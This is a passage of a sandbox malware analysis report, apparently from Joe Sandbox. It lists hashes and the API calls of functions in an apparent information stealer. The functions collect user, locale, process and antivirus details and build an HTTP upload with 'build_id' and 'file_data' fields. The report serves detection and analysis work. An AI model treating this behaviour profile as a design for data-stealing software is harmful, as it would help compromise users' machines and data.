• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
• String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
• API String ID: 4288110179-315474579
• Opcode ID: 18ef14b01f0c9b548d6f886a2cddc3af0617970d71857a954a9fda55c4d718fa
• Instruction ID: b95bad4894bedf1c9c1e13ef597345169fc039fd00888eec7af619e02c6c11b6
• Opcode Fuzzy Hash: 18ef14b01f0c9b548d6f886a2cddc3af0617970d71857a954a9fda55c4d718fa
• Instruction Fuzzy Hash: F0314871A40249BBCF259B95CC49EEFBABDEFCAB10F104249F111A71D0C7749A81CB20
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
• GetKeyboardLayoutList.USER32(00000000,00000000,001B670A,?,?), ref: 00190DE1
• LocalAlloc.KERNEL32(00000040,00000000), ref: 00190DEF
• GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00190DFD
• GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00190E2C
  • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
  • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
  • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
  • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
• LocalFree.KERNEL32(00000000), ref: 00190ED4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: lstrcpy$KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcatlstrlen
• String ID: /
• API String ID: 507856799-4001269591
• Opcode ID: b43fa0af2bf4bc50081dc9588074ce7c65627218a2727cb87d2cc758337d4c28
• Instruction ID: 4a7507c0371ea932c737ab0f2d49fa6517560f884ab95a866ac5a0cd2cb8ce10
• Opcode Fuzzy Hash: b43fa0af2bf4bc50081dc9588074ce7c65627218a2727cb87d2cc758337d4c28
• Instruction Fuzzy Hash: E6312875D00228AFDF21AB64EC89A9EB7B8BB18300F1145E6F519B7152CB74AE818F50
APIs
• __EH_prolog3_catch_GS.LIBCMT ref: 0019255E
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00197E73,.exe,001B6CD4,001B6CD0,001B6CCC,001B6CC8,001B6CC4,001B6CC0,001B6CBC,001B6CB8,001B6CB4,001B6CB0,001B6CAC), ref: 0019257D
• Process32First.KERNEL32(00000000,00000128), ref: 0019258D
• Process32Next.KERNEL32(00000000,00000128), ref: 0019259F
• StrCmpCA.SHLWAPI(?), ref: 001925B1
• CloseHandle.KERNEL32(00000000), ref: 001925C5
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
• Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstH_prolog3_catch_HandleNextSnapshotToolhelp32
• String ID:
• API String ID: 1799959500-0
• Opcode ID: b9cb689f6ea86836e7b5b0f2f3d258af9a5079fc4ee4dc6bcaa4b50b15bc66df
• Instruction ID: 8ca429f841209c6b405b7cc50c6db9b92cec3af2b8c1a3bd46136b8f4bca20f9
• Opcode Fuzzy Hash: b9cb689f6ea86836e7b5b0f2f3d258af9a5079fc4ee4dc6bcaa4b50b15bc66df
• Instruction Fuzzy Hash: 87013175A01254ABEB22ABA0DC08FFE7BBC9F15700F4401EAE409E71A1D7748E459B21
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,001B6918,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 00191106
• HeapAlloc.KERNEL32(00000000), ref: 0019110D
• GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00191129
• wsprintfA.USER32 ref: 0019114F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Yara matches
Similarity
• API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
• String ID: %d MB
• API String ID: 3644086013-2651807785
• Opcode ID: 8429b9d03aabd924042db9825ea7e72fec759760735c4e087bbaedc148eaf445
• Instruction ID: b4975a3231e7a2b36b1890562b4264542d83533f8179959934230ab72b21e896
• Opcode Fuzzy Hash: 8429b9d03aabd924042db9825ea7e72fec759760735c4e087bbaedc148eaf445
• Instruction Fuzzy Hash: 3F0136B5A41218BBEB05EFB4EC45AFE7BBCEF04B14F440126F502E7290DB7499818765
APIs
  • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001B670F,?,?), ref: 001914A9
• Process32First.KERNEL32(00000000,00000128), ref: 001914B9
• Process32Next.KERNEL32(00000000,00000128), ref: 00191517
• CloseHandle.KERNEL32(00000000), ref: 00191522
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcpy
• String ID:
• API String ID: 907984538-0
• Opcode ID: 0bbd3d86069399892e48c3a323b98e3aded648ec1a86d9d9fda2025271476ec4
• Instruction ID: 8ce0e0ee802b45d561ef4f216af32cd0e7e26c2cd93e00f5bd0dfc27f9d0b634
• Opcode Fuzzy Hash: 0bbd3d86069399892e48c3a323b98e3aded648ec1a86d9d9fda2025271476ec4
• Instruction Fuzzy Hash: 9C118275A002189BEB22BB64EC85AFE77ACAF58700F050095F80AB7251DB74EE858F50
APIs
• GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00190D1E
• HeapAlloc.KERNEL32(00000000), ref: 00190D25
• GetTimeZoneInformation.KERNEL32(?), ref: 00190D34
• wsprintfA.USER32 ref: 00190D52
Memory Dump Source
• Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocInformationProcessTimeZonewsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 362916592-0
                                                                                                                                                                        • Opcode ID: 95d22baf1e02f1acaa0ab690b1309e3620a13a46ba4be9fdb19be0adbee4662e
                                                                                                                                                                        • Instruction ID: 8959b72c7f2d3a517e53602beffba1d243a844a183c2ba10b011e2ac22bdfabb
                                                                                                                                                                        • Opcode Fuzzy Hash: 95d22baf1e02f1acaa0ab690b1309e3620a13a46ba4be9fdb19be0adbee4662e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF0E971601324ABEB01FBB4FC49BAB3BACAB04725F040256F515DB1D0DB709D458B91
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001813B9), ref: 00190C34
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,001813B9), ref: 00190C3B
                                                                                                                                                                        • GetUserNameA.ADVAPI32(00000000,001813B9), ref: 00190C4F
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1206570057-0
                                                                                                                                                                        • Opcode ID: c1c6a78fe3175e306f6f9590e74c1bf2d34bfc3569a1d5efe1d352456ba97362
                                                                                                                                                                        • Instruction ID: 9246232286b2201ac7037013b36fab88ad02b21bb79aec8a06f63a053ee7ed7a
                                                                                                                                                                        • Opcode Fuzzy Hash: c1c6a78fe3175e306f6f9590e74c1bf2d34bfc3569a1d5efe1d352456ba97362
                                                                                                                                                                        • Instruction Fuzzy Hash: 44D05BB5204204BBD741A7D5DC4DF8F77BCD788755F000155F645D2150D7F099848730
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InfoSystemwsprintf
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2452939696-0
                                                                                                                                                                        • Opcode ID: 21a52c0223ffdce870d8ff285b76cf9ae5e5250103938315ffdb00ab60dc9f87
                                                                                                                                                                        • Instruction ID: 8ab8a77da0f378cc6e641ad1af78c0dc2f42431d7102bc4cb8d43af05d5be666
                                                                                                                                                                        • Opcode Fuzzy Hash: 21a52c0223ffdce870d8ff285b76cf9ae5e5250103938315ffdb00ab60dc9f87
                                                                                                                                                                        • Instruction Fuzzy Hash: 67E012B195011D9BCF11EFA0FC559ED7BFCAB04304F4045B5A505E7190D774AB898F84
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrcmpiW.KERNEL32(?,?,?,?,?,?,00181503,avghookx.dll,00198586), ref: 001814DF
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                        • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1586166983-0
                                                                                                                                                                        • Opcode ID: d34a6fea11231841d32b12c99103b98cf0918207ac9d56d12b3079544e2c0af4
                                                                                                                                                                        • Instruction ID: a485f56a04da0aab6336a38b3ea79328870d218cdaad8a6e8128f3fabd3b9508
                                                                                                                                                                        • Opcode Fuzzy Hash: d34a6fea11231841d32b12c99103b98cf0918207ac9d56d12b3079544e2c0af4
                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF0FE37904154FBCF21DF59D804AAAF7BDEB47761F256054E409B3600C730EE55AB98

Control-flow Graph

• Legend: Executed / Not Executed
• Serialized graph omitted (basic blocks 185482-185f2f; the nodes wrap the calls listed under APIs below: lstrlenA, StrCmpCA, InternetOpenA, InternetConnectA, HttpOpenRequestA, InternetSetOptionA, HttpSendRequestA, HttpQueryInfoA, InternetReadFile, InternetCloseHandle and ExitProcess).
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001904EE: lstrcpyA.KERNEL32(00000000,?,?,00181D07,?,00197663), ref: 0019050D
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AE8
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AEE
                                                                                                                                                                          • Part of subcall function 00184AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00184AF4
                                                                                                                                                                          • Part of subcall function 00184AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00184B06
                                                                                                                                                                          • Part of subcall function 00184AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00184B0E
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00185519
                                                                                                                                                                          • Part of subcall function 00191E32: CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,00000000,003DE708,?,?,?,001928E1,?,?,00000000), ref: 00191E52
                                                                                                                                                                          • Part of subcall function 00191E32: GetProcessHeap.KERNEL32(00000000,?,?,?,?,001928E1,?,?,00000000), ref: 00191E5F
                                                                                                                                                                          • Part of subcall function 00191E32: HeapAlloc.KERNEL32(00000000,?,?,?,001928E1,?,?,00000000), ref: 00191E66
                                                                                                                                                                        • StrCmpCA.SHLWAPI(?,001B6976,001B695B,001B6957,001B694B), ref: 00185588
                                                                                                                                                                        • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 001855AA
                                                                                                                                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001856C0
                                                                                                                                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00185704
                                                                                                                                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00185736
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                        • lstrlenA.KERNEL32(?,",file_data,001B7848,------,001B783C,?,",001B7830,------,001B7824,df523263f44cc8d55414a260a0197e4a,",build_id,001B780C,------), ref: 00185C67
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00185C7A
                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00185C92
                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00185C99
                                                                                                                                                                        • lstrlenA.KERNEL32(?), ref: 00185CA6
                                                                                                                                                                        • _memmove.LIBCMT ref: 00185CB4
